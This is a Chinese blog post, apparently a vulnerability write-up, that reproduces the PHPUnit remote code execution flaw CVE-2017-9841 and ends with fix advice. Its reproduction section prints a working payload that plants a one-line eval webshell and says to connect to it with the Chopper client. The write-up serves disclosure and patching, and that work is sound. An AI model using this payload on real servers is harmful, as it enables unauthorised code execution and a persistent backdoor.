phpunit 远程代码执行漏洞(CVE-2017-9841)复现

  • 上海虹桥机场有这么一个故事,一对恋人在机场分手,女对男说“你别等我了,我们不会有结果,就像机场永远等不来火车,我们以后也不会有交集”。没过几年,虹桥机场跟火车站连在了一起,设计这个工程的总工程师就是那个男的,只要有爱就有办法,任何人都可以无止境的对一个人好,但是前提是值得。

漏洞概述:

  • PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架,通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。

漏洞版本:

  • 4.8.19 ~ 4.8.27
  • 5.0.10 ~ 5.6.2

基本原理:

  • 漏洞位于/phpunit/src/Util/PHP/eval-stdin.php。

    eval('?>'.file_get_contents('php://input'));

漏洞复现:

  • 总体来说就是向vendor/phpunit/src/Util/PHP/eval-stdin.php发送POST请求执行php代码。
  • 例如直接执行phpinfo
  • 也可以直接写入一句话木马。<?=file_put_contents("1.php", '<?=eval($_REQUEST[1]);?>');
    成功生成,即可菜刀连接。

漏洞修复:

  • 果断一点,生产环境中直接删掉phpunit,没有用。

  • 如果不想删,念旧情,直接升级吧,

  • 懒打升级?那就直接设置权限,禁止访问该目录。

    余生很长,请多指教。

phpunit 远程代码执行漏洞(CVE-2017-9841)复现相关推荐

  1. php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限

    此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...

  2. F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现

    一.在vmware上安装BIGIP-15.1.0 进入F5官方主页:https://support.f5.com/csp/home 点击下载按钮(如下图所示) 进入页面后,我们选择v15.X版本 选择 ...

  3. Weblogic远程代码执行漏洞(CVE-2023-21839)复现/保姆级讲解

    目录 引言 产品简介 漏洞描述 影响范围 漏洞复现 环境搭建 JDK安装: Weblogic安装: 漏洞利用 漏OracleOracle 引言 本文内容仅供学习参考,若读者利用本文内容做出违法行为,笔 ...

  4. SMB v1远程代码执行漏洞(CVE-2020-1301)复现

    0x00影响版本 参考:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301 0x01漏洞分 ...

  5. CVE-2021-1675: Windows Print Spooler远程代码执行漏洞

    ** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-29 1 漏洞简述 2021年06月29日 ...

  6. 【安全风险通告】Spring Framework远程代码执行漏洞(CVE-2022-22965)安全风险通告第二次更新...

    奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 近日,奇安信CERT监测到Spring Framework存在远程代码执行漏洞(CVE-2022-22965),在 ...

  7. CVE-2018-8174 IE浏览器远程代码执行漏洞

    0x00漏洞简介 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用 原文地址:http://www.4hou.c ...

  8. Splunk Enterprise远程代码执行漏洞(CVE-2022-43571)安全风险通告

    奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 安全通告 Splunk Enterprise是机器数据的引擎.使用Splunk可收集.索引和利用所有应用程序.服务器和设备生 ...

  9. [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

最新文章

  1. 【Spring实战】—— 5 设值注入
  2. Mac虚拟机安装windows教程--Parallels 5
  3. 《LeetCode力扣练习》第6题 C语言版 (做出来就行,别问我效率。。。。)
  4. 查看go 安装了哪些包_如何灵活地进行 Go 版本管理
  5. Ubuntu 16.04 下安装VMware Tools(三行命令搞定,亲测好使)
  6. 打开是什么样子的图片_情侣头像 | 无论是什么样子的你 我都好喜欢
  7. 三星Galaxy Note 20系列或将于8月5日发布
  8. linux中断调用spi函数,基于Linux的ARM与FPGA SPI驱动,中断函数调用spidev_sync_read(),出现异常...
  9. 20155303 2016-2017-2 《Java程序设计》第一周学习总结
  10. 使用VSCode玩转Java (二)
  11. Windows查看所有共享
  12. android gridview textview,gogo体育官方网站-gogo体育官方网站
  13. php递归算法计算n 介乘,递归算法示例——计算N的阶乘
  14. 计算机考博面试题,交大系统博士笔试和面试题目
  15. 【cocos creator与C++知识分享】 二.anysdk打包微信登录、微信分享
  16. 电脑同步控制android设备,Total Control 免费使用电脑同时控制多台手机的教程及使用方法...
  17. html背景图片不重叠铺满,html中背景图片铺满页面没有重复的效果
  18. 微信公众号学习与开发过程
  19. 计算机等级二级公共基础
  20. layui 动态绑定下拉框

热门文章

  1. HENUOJ-1007-CYT大佬的女装(贪心算法)
  2. 计算机启动进入桌面非常慢,电脑开机加载桌面很慢的解决办法
  3. MAC使用GTK创建界面
  4. cube函数matlab_Matlab geom3d函数注释
  5. CTF(信息安全夺旗赛)学习网址
  6. 【笑小枫的SpringBoot系列】【十五】SpringBoot根据模板生成Word
  7. 【雯女遭TVB封杀没剧拍】
  8. 手把手教你python实现量价形态选股知乎_如何通过量价形态选股
  9. 数学模型奶制品生产c语言编程,数学模型 奶制品的生产与销售.ppt
  10. 想听世界上最懂 JavaScript 的人和你讲JavaScript 吗?